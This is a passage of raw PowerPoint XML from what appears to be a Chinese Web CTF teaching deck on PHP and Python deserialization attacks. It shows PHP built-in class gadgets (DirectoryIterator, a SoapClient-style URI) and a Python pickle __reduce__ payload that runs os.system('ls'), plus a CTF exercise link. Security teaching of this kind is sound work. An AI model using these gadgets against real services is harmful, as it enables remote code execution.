              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array</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uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'=&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://zzm.cat8080</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location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'=&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://zzm.cat:8080</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a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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b</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serialize</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a</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a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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c</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unserialize</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b</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a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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41654596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反序列化</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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中可以利用的内置类</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB2B6D3-1390-A043-8254-F6CC6C61DDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082040" y="1838066"/>
            <a:ext cx="9296400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>DirectoryIterator</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>__construct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>方法调用时导致列目录）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BCC735-6D3D-F443-9E1F-987FD9B177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082040" y="2739753"/>
            <a:ext cx="6096000" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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c</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DirectoryIterator</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endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B83CD"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foreach</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c</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as</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cc</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</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cc</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&lt;/br&gt;</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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119671244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反序列化</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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反序列化（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cpickle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89FCBC42-750C-5E4F-9332-BFFE898E12E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="1838066"/>
            <a:ext cx="6096000" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pickle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> os</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Test</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object</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__init__</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self</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2"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</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a </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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</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b </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2</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2"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</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c </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3</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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os</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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aa </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Test</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bb </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 pickle</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dumps</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aa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</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pickle</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loads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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130990129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3280" y="203200"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F053829-F3CD-9F47-9037-2AC1F62E3146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="920221"/>
            <a:ext cx="9677400" cy="662489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://web.jarvisoj.com:32784/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65907191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7152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387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013122" y="2206360"/>
            <a:ext cx="1762771" cy="1641349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10665" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="10665" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="10665">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3891069" y="2657702"/>
            <a:ext cx="6497570" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>中的常用工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322892391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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
